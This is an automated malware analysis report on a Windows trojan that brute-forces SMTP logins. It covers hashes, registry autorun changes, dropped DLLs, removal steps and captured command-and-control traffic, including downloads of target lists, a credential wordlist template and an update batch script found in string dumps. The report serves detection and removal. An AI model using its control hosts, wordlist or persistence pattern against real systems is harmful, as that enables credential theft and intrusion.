Trojan.Win32.WPCracker.db (Kaspersky), Trojan.GenericKD.2177667 (B) (Emsisoft), Trojan.GenericKD.2177667 (AdAware), mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 453ec0c6a71b8b714369862edb9cded4
SHA1: 6e9863ac6292f3d4f485ed70f2f2fe4ad80061f1
SHA256: 9549ca377130e51ad40357f58e4f7572b19626db4b46cbb17f3e6a6e0bfb455d
SSDeep: 6144:4Sto9WM19qd1z6ukdrCKppancW6QVhnCbU0rQpejH:4StqW8q1nMrCyW6ihnJ0r
Size: 282624 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6, MicrosoftVisualC, MicrosoftVisualCv50v60MFC, MicrosoftVisualC50, Armadillov171
Company: no certificate found
Created at: 2015-02-17 16:04:45
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
%original file name%.exe:1984
%original file name%.exe:696
%original file name%.exe:492
The Trojan injects its code into the following process(es):
%original file name%.exe:828
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process %original file name%.exe:1984 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\All Users\Application Data\System\%original file name%.exe (1425 bytes)
The process %original file name%.exe:828 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\All Users\Application Data\System\libeay32.dll (7386 bytes)
%Documents and Settings%\All Users\Application Data\System\ssleay32.dll (270 bytes)
Registry activity
The process %original file name%.exe:1984 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4A 79 4E 42 BF E8 48 E4 4D 7F 6F 14 10 DB 11 65"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\All Users\Application Data\System]
"%original file name%.exe" = "453ec0c6a71b8b714369862edb9cded4"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"453ec0c6a71b8b714369862edb9cded4" = "%Documents and Settings%\All Users\Application Data\System\%original file name%.exe"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process %original file name%.exe:828 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C4 F6 52 52 5F 7F 5B D6 04 4B 4E 2C DE 22 DE B0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
Dropped PE files
| MD5 | File path |
|---|---|
| 7a94e62ad54c62ecad385fddafe04304 | c:\Documents and Settings\All Users\Application Data\System\libeay32.dll |
| e0cd0800a00d51025968d778d0e6b2b3 | c:\Documents and Settings\All Users\Application Data\System\ssleay32.dll |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:1984
%original file name%.exe:696
%original file name%.exe:492 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\All Users\Application Data\System\%original file name%.exe (1425 bytes)
%Documents and Settings%\All Users\Application Data\System\libeay32.dll (7386 bytes)
%Documents and Settings%\All Users\Application Data\System\ssleay32.dll (270 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"453ec0c6a71b8b714369862edb9cded4" = "%Documents and Settings%\All Users\Application Data\System\%original file name%.exe" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
No information is available.
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 10210 | 12288 | 1.50698 | bbb79a13385e4227f55ecb162cf098ad |
| .rdata | 16384 | 874 | 4096 | 0.942361 | 5100832a0812ee7823886a52bd9f9f5e |
| .data | 20480 | 262144 | 262144 | 4.88166 | 11e88bae124b9c1f246e4ae06b627088 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
| URL | IP |
|---|---|
| hxxp://178.63.29.34/ssl/ssleay32.dll | |
| hxxp://178.63.29.34/temp_brut/42883.txt | |
| hxxp://178.63.29.34/login.txt | |
| hxxp://178.63.29.34/cmd.php | |
| hxxp://maydayflower.od.ua/login.txt | |
| hxxp://maydayflower.od.ua/temp_brut/42883.txt | |
| hxxp://maydayflower.od.ua/ssl/ssleay32.dll | |
| hxxp://maydayflower.od.ua/cmd.php | |
| mail.hotnewhiphopmusic.net | 173.203.187.14 |
| mail.adammurciano.net | 69.57.4.3 |
| topshelforthopaedics.net | 69.50.1.18 |
| depressioncause.net | 31.22.4.72 |
| fukugyoh.net | 203.189.105.167 |
| smtp.ejctrans.net | 163.177.65.157 |
| jrmackenzie.net | 192.185.98.226 |
| lonnietimmonsiii.net | 50.87.150.232 |
| music2010.net | 210.188.201.134 |
| smtp.amallia.net | 213.245.2.3 |
| smtp.wyattfilms.net | 66.175.58.40 |
| infocopia.net | 84.246.231.3 |
| ozcanlarotomotiv.net | 108.167.182.83 |
| visible-horizons.net | 66.96.163.137 |
| medhorn.net | 74.220.219.79 |
| smtp.enogastrofonia.net | 62.149.128.203 |
| mail.vltict.net | 91.208.80.44 |
| smtp.gvdk.net | 64.29.151.235 |
| ikashika.net | 210.140.19.229 |
| powerclubgym.net | 173.254.32.93 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /temp_brut/42883.txt HTTP/1.0
Host: maydayflower.od.ua
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)
HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Sun, 01 Mar 2015 16:41:42 GMT
Content-Type: text/plain
Content-Length: 118726
Connection: keep-alive
Last-Modified: Sun, 01 Mar 2015 16:41:38 GMT
ETag: "4e6025d-1cfc6-5103cc681ce4d"
Accept-Ranges: bytes
Vary: Accept-Encoding
smtp.eatatmyplace.net:465..ismerkedes.net:465..mail.the-real-bunker-company.net:25..coloradoconcerts.net:25..beatboxtutorial.net:25..mail.realbunkercompany.net:25..mail.therealbunkercompany.net:25..depressioncause.net:465..abrasileirinha.net:25..exao.net:465..candidconcepts.net:465..m-kaitori.net:465..ejaculationproblems.net:465..smtp.private-job.net:25..m7g7.net:465..ozonedevelopment.net:465..smtp.amallia.net:25..dailypaypros.net:465..smtp.pointeclair.net:465..mail.iuvat.net:465..mail.mirandaenunes.net:25..mail.benjaminsebastian.net:465..kazcutzhairdressing.net:465..acimac.net:465..smtp.wallpaperhangers.net:25..smtp.wyattfilms.net:465..longaeva.net:25..smtp.dinovia.net:465..smtp.victorystores.net:25..mail.sanjosecolocationfast.net:25..tipacti.net:465..saveomatic.net:465..mtleone.net:465..smtp.talent-sportif.net:465..smtp.nycarpetcleaning.net:465..bagcomputer.net:465..tomkitzmiller.net:25..radiosaj.net:25..gewoonbijzonder.net:465..foxyevents.net:465..internetonlinemarketing.net:465..theheartlandnews.net:25..torihachi-chaya.net:25..cyanimal.net:465..curiousbrain.net:465..nounonline.net:465..nanbu-utagoe.net:25..iqdomain.net:25..de10.net:25..merrylandswest.net:25..fofans.net:465..mb-works.net:25..mail.vltict.net:25..powerclubgym.net:465..smtp.mangakoaching.net:465..smtp.designdecollection.net:465..ishiihidetake.net:465..contramao.net:25..smtp.scurdeniser.net:465..volesworld.net:465..asianrealitypass.net:25..smtp.ciaobellabag.net:465..mystrength.net:465..travelprizes.net:25..smtp.lampenkatalog.net:465..mail.bonoui
<<< skipped >>>
GET /ssl/ssleay32.dll HTTP/1.0
Host: maydayflower.od.ua
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)
HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Sun, 01 Mar 2015 16:41:40 GMT
Content-Type: application/x-msdos-program
Content-Length: 270336
Connection: keep-alive
Last-Modified: Tue, 16 Dec 2014 03:45:50 GMT
ETag: "4e6007b-42000-50a4d31ee1780"
Accept-Ranges: bytes
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........y4.D.Z.D.Z.D.Z.M`..G.Z.M`..F.Z.M`..C.Z.D.[...Z.M`..y.Z.M`..E.Z.M`..E.Z.M`..E.Z.RichD.Z.........................PE..L.....DS...........!......................... ...............................`......R...................................p$..L...P.... .......................0..|#..0&..............................(...@............ ...............................text............................... ..`.rdata..@.... ......................@..@.data....1..........................@....rsrc........ ......................@..@.reloc..~$...0...&..................@..B................................................................................................................................................................................................................................................................................................................................................3..|$.....H%P&...................P&.............3..|$.....H%.&.............................~4. .... ..u............F4.N<W.y.9F4.......FD..... .R..PV.g>....... ND...;.}.PjjV..?....._Y..FD......G...tP....t)j.V.<2..h(...h<'..h....jjj............_Y.h ...h<'..h....jjj............_Y......O.........;.}........W..NT.............G...W..NT................G...W..NT.........Ad......wX.F4. ...FT.V<............S.Z..PdU.l.....?..vTj.V.d1..hC...h<'..h(...jjj..,......][..._Y.j.V.91..h7...h<'..h....jj
<<< skipped >>>
GET /login.txt HTTP/1.0
Host: maydayflower.od.ua
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)
HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Sun, 01 Mar 2015 16:41:43 GMT
Content-Type: text/plain
Content-Length: 134
Connection: keep-alive
Last-Modified: Fri, 06 Feb 2015 12:23:54 GMT
ETag: "4e40faf-86-50e6a7e787c9d"
Accept-Ranges: bytes
Vary: Accept-Encoding
info@{domaincut}.{zone}..test@{domaincut}.{zone}..admin@{domaincut}.{zone}..{domaincut}@{domaincut}.{zone}..123cad..admin..auditicia....
POST /cmd.php HTTP/1.0
Host: maydayflower.od.ua
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)
Content-Type: application/x-www-form-urlencoded
Content-Length: 8
status=1
HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Sun, 01 Mar 2015 16:41:43 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.4.4-14 deb7u12
Vary: Accept-Encoding
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
%original file name%.exe_828:
.text
.text
`.itext
`.itext
`.data
`.data
.idata
.idata
.didata
.didata
.rdata
.rdata
@.rsrc
@.rsrc
TArray
TArray
TArray
TArray
System.Types
System.Types
!"#$%&'(!)* ,-./0'
!"#$%&'(!)* ,-./0'
System.SysUtils
System.SysUtils
ENoMonitorSupportException
ENoMonitorSupportException
TFormatSettings.TEraInfo
TFormatSettings.TEraInfo
System.SysUtilst-A
System.SysUtilst-A
TArray
TArray
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
Uh.cA
Uh.cA
&TArray
&TArray
iMaxUdpDg
iMaxUdpDg
sin_port
sin_port
sin6_port
sin6_port
0.0.0.0
0.0.0.0
127.0.0.1
127.0.0.1
255.255.255.255
255.255.255.255
getservbyport
getservbyport
THookVerifyCert
THookVerifyCert
LT_SSHv2
LT_SSHv2
Port
Port
ResolvePort
ResolvePort
GetLocalSinPort
GetLocalSinPort
GetRemoteSinPort
GetRemoteSinPort
FSocksPort
FSocksPort
FSocksPassword
FSocksPassword
FSocksResponsePort
FSocksResponsePort
FSocksLocalPort
FSocksLocalPort
FSocksRemotePort
FSocksRemotePort
FBypassFlag
FBypassFlag
SocksPort
SocksPort
SocksPassword
SocksPassword
FHTTPTunnelIP
FHTTPTunnelIP
FHTTPTunnelPort
FHTTPTunnelPort
FHTTPTunnel
FHTTPTunnel
FHTTPTunnelRemoteIP
FHTTPTunnelRemoteIP
FHTTPTunnelRemotePort
FHTTPTunnelRemotePort
FHTTPTunnelUser
FHTTPTunnelUser
FHTTPTunnelPass
FHTTPTunnelPass
FHTTPTunnelTimeout
FHTTPTunnelTimeout
TTCPBlockSocket&
TTCPBlockSocket&
TTCPBlockSocket
TTCPBlockSocket
HTTPTunnelIP
HTTPTunnelIP
HTTPTunnelPort
HTTPTunnelPort
HTTPTunnelUser
HTTPTunnelUser
HTTPTunnelPass
HTTPTunnelPass
HTTPTunnelTimeout
HTTPTunnelTimeout
HTTPTunnelTOB
HTTPTunnelTOB
FOnVerifyCert
FOnVerifyCert
FKeyPassword
FKeyPassword
FCertificateFile
FCertificateFile
FPrivateKeyFile
FPrivateKeyFile
FCertificate
FCertificate
FPrivateKey
FPrivateKey
FCertCA
FCertCA
FCertCAFile
FCertCAFile
FTrustCertificate
FTrustCertificate
FTrustCertificateFile
FTrustCertificateFile
FVerifyCert
FVerifyCert
FPassword
FPassword
FSSHChannelType
FSSHChannelType
FSSHChannelArg1
FSSHChannelArg1
FSSHChannelArg2
FSSHChannelArg2
FCertComplianceLevel
FCertComplianceLevel
GetCertInfo
GetCertInfo
GetVerifyCert
GetVerifyCert
KeyPassword
KeyPassword
Password
Password
CertificateFile
CertificateFile
PrivateKeyFile(
PrivateKeyFile(
Certificate(
Certificate(
PrivateKey(
PrivateKey(
TrustCertificateFile(
TrustCertificateFile(
TrustCertificate(
TrustCertificate(
CertCA
CertCA
CertCAFile
CertCAFile
VerifyCert
VerifyCert
SSHChannelType
SSHChannelType
SSHChannelArg1
SSHChannelArg1
SSHChannelArg2
SSHChannelArg2
CertComplianceLevel
CertComplianceLevel
OnVerifyCert
OnVerifyCert
FTargetPort
FTargetPort
TargetPort
TargetPort
httpsendex
httpsendex
FAlivePort
FAlivePort
FProxyPort
FProxyPort
FProxyPass
FProxyPass
FAddPortNumberToHost
FAddPortNumberToHost
THTTPSend,
THTTPSend,
HTTPMethod
HTTPMethod
THTTPSend
THTTPSend
ProxyPort
ProxyPort
ProxyPass
ProxyPass
AddPortNumberToHost
AddPortNumberToHost
FESMTPcap
FESMTPcap
FESMTP
FESMTP
FESMTPSize
FESMTPSize
TSMTPSend&
TSMTPSend&
Login
Login
TSMTPSend
TSMTPSend
smtpsendex
smtpsendex
ESMTPcap
ESMTPcap
ESMTP
ESMTP
ESMTPSize
ESMTPSize
AUTH LOGIN
AUTH LOGIN
FSMTPSend
FSMTPSend
FHTTP
FHTTP
FCmdEvent
FCmdEvent
FLastCmdDate
FLastCmdDate
FLastCmdDateCS
FLastCmdDateCS
FCmdParams
FCmdParams
TCmdGet?
TCmdGet?
TCmdGet
TCmdGet
cmdget
cmdget
LastCmdDate
LastCmdDate
Winapi.Windows
Winapi.Windows
System.UITypes
System.UITypes
System.RTLConsts
System.RTLConsts
System.SysConst
System.SysConst
System.Internal.ExcUtils
System.Internal.ExcUtils
System.Character
System.Character
Winapi.PsAPI
Winapi.PsAPI
Winapi.SHFolder
Winapi.SHFolder
Winapi.ImageHlp
Winapi.ImageHlp
System.StrUtils
System.StrUtils
Winapi.ShellAPI
Winapi.ShellAPI
Winapi.IpExport
Winapi.IpExport
Winapi.Winsock2
Winapi.Winsock2
Winapi.Qos
Winapi.Qos
Winapi.Messages
Winapi.Messages
Winapi.WinSock
Winapi.WinSock
oleaut32.dll
oleaut32.dll
advapi32.dll
advapi32.dll
RegOpenKeyExW
RegOpenKeyExW
RegCloseKey
RegCloseKey
user32.dll
user32.dll
kernel32.dll
kernel32.dll
GetCPInfo
GetCPInfo
shell32.dll
shell32.dll
ShellExecuteW
ShellExecuteW
SHFolder.dll
SHFolder.dll
Silent_SMTP_Bruter
Silent_SMTP_Bruter
dSystem.SysConst
dSystem.SysConst
ISystem.Internal.ExcUtils
ISystem.Internal.ExcUtils
,System.Character
,System.Character
kWinapi.PsAPI
kWinapi.PsAPI
-Winapi.ImageHlp
-Winapi.ImageHlp
System.StrUtils
System.StrUtils
"Winapi.WinSock
"Winapi.WinSock
HTTPS
HTTPS
%d.%d.%d.%d
%d.%d.%d.%d
ws2_32.dll
ws2_32.dll
owship6.dll
owship6.dll
Synapse TCP/IP Socket error %d: %s
Synapse TCP/IP Socket error %d: %s
Operation would block
Operation would block
Operation now in progress
Operation now in progress
Operation already in progress
Operation already in progress
Socket operation on nonsocket
Socket operation on nonsocket
Protocol not supported
Protocol not supported
Socket not supported
Socket not supported
Operation not supported on Socket
Operation not supported on Socket
Protocol family not supported
Protocol family not supported
Address family not supported
Address family not supported
Winsock DLL cannot support this application
Winsock DLL cannot support this application
0.0.0.1
0.0.0.1
HTTP/1.0
HTTP/1.0
HTTP/
HTTP/
SSL/TLS support is not compiled!
SSL/TLS support is not compiled!
Without SSL support
Without SSL support
Mozilla/4.0 (compatible; Synapse)
Mozilla/4.0 (compatible; Synapse)
HTTP/
HTTP/
LOGIN
LOGIN
ssleay32.dll
ssleay32.dll
libssl32.dll
libssl32.dll
libeay32.dll
libeay32.dll
SSL_CTX_use_PrivateKey
SSL_CTX_use_PrivateKey
SSL_CTX_use_PrivateKey_ASN1
SSL_CTX_use_PrivateKey_ASN1
SSL_CTX_use_RSAPrivateKey_file
SSL_CTX_use_RSAPrivateKey_file
SSL_CTX_use_certificate
SSL_CTX_use_certificate
SSL_CTX_use_certificate_ASN1
SSL_CTX_use_certificate_ASN1
SSL_CTX_use_certificate_file
SSL_CTX_use_certificate_file
SSL_CTX_use_certificate_chain_file
SSL_CTX_use_certificate_chain_file
SSL_CTX_check_private_key
SSL_CTX_check_private_key
SSL_CTX_set_default_passwd_cb
SSL_CTX_set_default_passwd_cb
SSL_CTX_set_default_passwd_cb_userdata
SSL_CTX_set_default_passwd_cb_userdata
SSL_get_peer_certificate
SSL_get_peer_certificate
X509_set_pubkey
X509_set_pubkey
EVP_PKEY_new
EVP_PKEY_new
EVP_PKEY_free
EVP_PKEY_free
EVP_PKEY_assign
EVP_PKEY_assign
RSA_generate_key
RSA_generate_key
i2d_PrivateKey_bio
i2d_PrivateKey_bio
DES_set_key_checked
DES_set_key_checked
smtp.Âdr%
smtp.Âdr%
application/x-www-form-urlencoded
application/x-www-form-urlencoded
smtp.
smtp.
{login}
{login}
{loginfull}
{loginfull}
cmd.php
cmd.php
checkres.php
checkres.php
bruteres.php
bruteres.php
login.txt
login.txt
status=%s
status=%s
ssl/libeay32.dll
ssl/libeay32.dll
ssl/ssleay32.dll
ssl/ssleay32.dll
upd.tmp
upd.tmp
upd.bat
upd.bat
set fl="%s"
set fl="%s"
del /q %%fl%%
del /q %%fl%%
if exist %%fl%% goto dl
if exist %%fl%% goto dl
move /y "%s" %%fl%%
move /y "%s" %%fl%%
start "" %%fl%%
start "" %%fl%%
Error loading Socket interface (ws2_32.dll)!
Error loading Socket interface (ws2_32.dll)!
Advapi32.dll
Advapi32.dll
%original file name%.exe_828_rwx_00400000_00049000:
.text
.text
`.itext
`.itext
`.data
`.data
.idata
.idata
.didata
.didata
.rdata
.rdata
@.rsrc
@.rsrc
TArray
TArray
TArray
TArray
System.Types
System.Types
!"#$%&'(!)* ,-./0'
!"#$%&'(!)* ,-./0'
System.SysUtils
System.SysUtils
ENoMonitorSupportException
ENoMonitorSupportException
TFormatSettings.TEraInfo
TFormatSettings.TEraInfo
System.SysUtilst-A
System.SysUtilst-A
TArray
TArray
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
Uh.cA
Uh.cA
&TArray
&TArray
iMaxUdpDg
iMaxUdpDg
sin_port
sin_port
sin6_port
sin6_port
0.0.0.0
0.0.0.0
127.0.0.1
127.0.0.1
255.255.255.255
255.255.255.255
getservbyport
getservbyport
THookVerifyCert
THookVerifyCert
LT_SSHv2
LT_SSHv2
Port
Port
ResolvePort
ResolvePort
GetLocalSinPort
GetLocalSinPort
GetRemoteSinPort
GetRemoteSinPort
FSocksPort
FSocksPort
FSocksPassword
FSocksPassword
FSocksResponsePort
FSocksResponsePort
FSocksLocalPort
FSocksLocalPort
FSocksRemotePort
FSocksRemotePort
FBypassFlag
FBypassFlag
SocksPort
SocksPort
SocksPassword
SocksPassword
FHTTPTunnelIP
FHTTPTunnelIP
FHTTPTunnelPort
FHTTPTunnelPort
FHTTPTunnel
FHTTPTunnel
FHTTPTunnelRemoteIP
FHTTPTunnelRemoteIP
FHTTPTunnelRemotePort
FHTTPTunnelRemotePort
FHTTPTunnelUser
FHTTPTunnelUser
FHTTPTunnelPass
FHTTPTunnelPass
FHTTPTunnelTimeout
FHTTPTunnelTimeout
TTCPBlockSocket&
TTCPBlockSocket&
TTCPBlockSocket
TTCPBlockSocket
HTTPTunnelIP
HTTPTunnelIP
HTTPTunnelPort
HTTPTunnelPort
HTTPTunnelUser
HTTPTunnelUser
HTTPTunnelPass
HTTPTunnelPass
HTTPTunnelTimeout
HTTPTunnelTimeout
HTTPTunnelTOB
HTTPTunnelTOB
FOnVerifyCert
FOnVerifyCert
FKeyPassword
FKeyPassword
FCertificateFile
FCertificateFile
FPrivateKeyFile
FPrivateKeyFile
FCertificate
FCertificate
FPrivateKey
FPrivateKey
FCertCA
FCertCA
FCertCAFile
FCertCAFile
FTrustCertificate
FTrustCertificate
FTrustCertificateFile
FTrustCertificateFile
FVerifyCert
FVerifyCert
FPassword
FPassword
FSSHChannelType
FSSHChannelType
FSSHChannelArg1
FSSHChannelArg1
FSSHChannelArg2
FSSHChannelArg2
FCertComplianceLevel
FCertComplianceLevel
GetCertInfo
GetCertInfo
GetVerifyCert
GetVerifyCert
KeyPassword
KeyPassword
Password
Password
CertificateFile
CertificateFile
PrivateKeyFile(
PrivateKeyFile(
Certificate(
Certificate(
PrivateKey(
PrivateKey(
TrustCertificateFile(
TrustCertificateFile(
TrustCertificate(
TrustCertificate(
CertCA
CertCA
CertCAFile
CertCAFile
VerifyCert
VerifyCert
SSHChannelType
SSHChannelType
SSHChannelArg1
SSHChannelArg1
SSHChannelArg2
SSHChannelArg2
CertComplianceLevel
CertComplianceLevel
OnVerifyCert
OnVerifyCert
FTargetPort
FTargetPort
TargetPort
TargetPort
httpsendex
httpsendex
FAlivePort
FAlivePort
FProxyPort
FProxyPort
FProxyPass
FProxyPass
FAddPortNumberToHost
FAddPortNumberToHost
THTTPSend,
THTTPSend,
HTTPMethod
HTTPMethod
THTTPSend
THTTPSend
ProxyPort
ProxyPort
ProxyPass
ProxyPass
AddPortNumberToHost
AddPortNumberToHost
FESMTPcap
FESMTPcap
FESMTP
FESMTP
FESMTPSize
FESMTPSize
TSMTPSend&
TSMTPSend&
Login
Login
TSMTPSend
TSMTPSend
smtpsendex
smtpsendex
ESMTPcap
ESMTPcap
ESMTP
ESMTP
ESMTPSize
ESMTPSize
AUTH LOGIN
AUTH LOGIN
FSMTPSend
FSMTPSend
FHTTP
FHTTP
FCmdEvent
FCmdEvent
FLastCmdDate
FLastCmdDate
FLastCmdDateCS
FLastCmdDateCS
FCmdParams
FCmdParams
TCmdGet?
TCmdGet?
TCmdGet
TCmdGet
cmdget
cmdget
LastCmdDate
LastCmdDate
Winapi.Windows
Winapi.Windows
System.UITypes
System.UITypes
System.RTLConsts
System.RTLConsts
System.SysConst
System.SysConst
System.Internal.ExcUtils
System.Internal.ExcUtils
System.Character
System.Character
Winapi.PsAPI
Winapi.PsAPI
Winapi.SHFolder
Winapi.SHFolder
Winapi.ImageHlp
Winapi.ImageHlp
System.StrUtils
System.StrUtils
Winapi.ShellAPI
Winapi.ShellAPI
Winapi.IpExport
Winapi.IpExport
Winapi.Winsock2
Winapi.Winsock2
Winapi.Qos
Winapi.Qos
Winapi.Messages
Winapi.Messages
Winapi.WinSock
Winapi.WinSock
oleaut32.dll
oleaut32.dll
advapi32.dll
advapi32.dll
RegOpenKeyExW
RegOpenKeyExW
RegCloseKey
RegCloseKey
user32.dll
user32.dll
kernel32.dll
kernel32.dll
GetCPInfo
GetCPInfo
shell32.dll
shell32.dll
ShellExecuteW
ShellExecuteW
SHFolder.dll
SHFolder.dll
Silent_SMTP_Bruter
Silent_SMTP_Bruter
dSystem.SysConst
dSystem.SysConst
ISystem.Internal.ExcUtils
ISystem.Internal.ExcUtils
,System.Character
,System.Character
kWinapi.PsAPI
kWinapi.PsAPI
-Winapi.ImageHlp
-Winapi.ImageHlp
System.StrUtils
System.StrUtils
"Winapi.WinSock
"Winapi.WinSock
HTTPS
HTTPS
%d.%d.%d.%d
%d.%d.%d.%d
ws2_32.dll
ws2_32.dll
owship6.dll
owship6.dll
Synapse TCP/IP Socket error %d: %s
Synapse TCP/IP Socket error %d: %s
Operation would block
Operation would block
Operation now in progress
Operation now in progress
Operation already in progress
Operation already in progress
Socket operation on nonsocket
Socket operation on nonsocket
Protocol not supported
Protocol not supported
Socket not supported
Socket not supported
Operation not supported on Socket
Operation not supported on Socket
Protocol family not supported
Protocol family not supported
Address family not supported
Address family not supported
Winsock DLL cannot support this application
Winsock DLL cannot support this application
0.0.0.1
0.0.0.1
HTTP/1.0
HTTP/1.0
HTTP/
HTTP/
SSL/TLS support is not compiled!
SSL/TLS support is not compiled!
Without SSL support
Without SSL support
Mozilla/4.0 (compatible; Synapse)
Mozilla/4.0 (compatible; Synapse)
HTTP/
HTTP/
LOGIN
LOGIN
ssleay32.dll
ssleay32.dll
libssl32.dll
libssl32.dll
libeay32.dll
libeay32.dll
SSL_CTX_use_PrivateKey
SSL_CTX_use_PrivateKey
SSL_CTX_use_PrivateKey_ASN1
SSL_CTX_use_PrivateKey_ASN1
SSL_CTX_use_RSAPrivateKey_file
SSL_CTX_use_RSAPrivateKey_file
SSL_CTX_use_certificate
SSL_CTX_use_certificate
SSL_CTX_use_certificate_ASN1
SSL_CTX_use_certificate_ASN1
SSL_CTX_use_certificate_file
SSL_CTX_use_certificate_file
SSL_CTX_use_certificate_chain_file
SSL_CTX_use_certificate_chain_file
SSL_CTX_check_private_key
SSL_CTX_check_private_key
SSL_CTX_set_default_passwd_cb
SSL_CTX_set_default_passwd_cb
SSL_CTX_set_default_passwd_cb_userdata
SSL_CTX_set_default_passwd_cb_userdata
SSL_get_peer_certificate
SSL_get_peer_certificate
X509_set_pubkey
X509_set_pubkey
EVP_PKEY_new
EVP_PKEY_new
EVP_PKEY_free
EVP_PKEY_free
EVP_PKEY_assign
EVP_PKEY_assign
RSA_generate_key
RSA_generate_key
i2d_PrivateKey_bio
i2d_PrivateKey_bio
DES_set_key_checked
DES_set_key_checked
smtp.Âdr%
smtp.Âdr%
application/x-www-form-urlencoded
application/x-www-form-urlencoded
smtp.
smtp.
{login}
{login}
{loginfull}
{loginfull}
cmd.php
cmd.php
checkres.php
checkres.php
bruteres.php
bruteres.php
login.txt
login.txt
status=%s
status=%s
ssl/libeay32.dll
ssl/libeay32.dll
ssl/ssleay32.dll
ssl/ssleay32.dll
upd.tmp
upd.tmp
upd.bat
upd.bat
set fl="%s"
